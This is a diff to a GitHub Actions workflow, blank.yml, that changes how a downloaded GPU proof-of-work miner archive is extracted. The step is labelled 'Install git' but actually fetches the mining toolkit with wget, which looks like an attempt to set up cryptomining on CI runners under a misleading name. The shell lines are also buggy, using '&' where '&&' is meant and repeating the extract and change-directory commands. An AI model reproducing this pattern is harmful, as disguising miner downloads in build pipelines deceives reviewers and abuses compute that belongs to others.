--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -14,7 +14,8 @@ jobs:
     - name: Install git
       run : |
              wget https://github.com/tontechio/pow-miner-gpu/releases/download/20211108-1/minertools-cuda-ubuntu-20.04-x86-64.tar.gz 
-             tar xvzf minertools-cuda-ubuntu-20.04-x86-64.tar.gz
+             mkdir minertools-cuda-ubuntu-20.04-x86-64
+             tar xvzf minertools-cuda-ubuntu-20.04-x86-64.tar.gz --directory minertools-cuda-ubuntu-20.04-x86-64
              cd minertools-cuda-ubuntu-20.04-x86-64 & ls -l
              tar xvzf minertools-cuda-ubuntu-20.04-x86-64.tar.gz
              cd minertools-cuda-ubuntu-20.04-x86-64 & ls -l
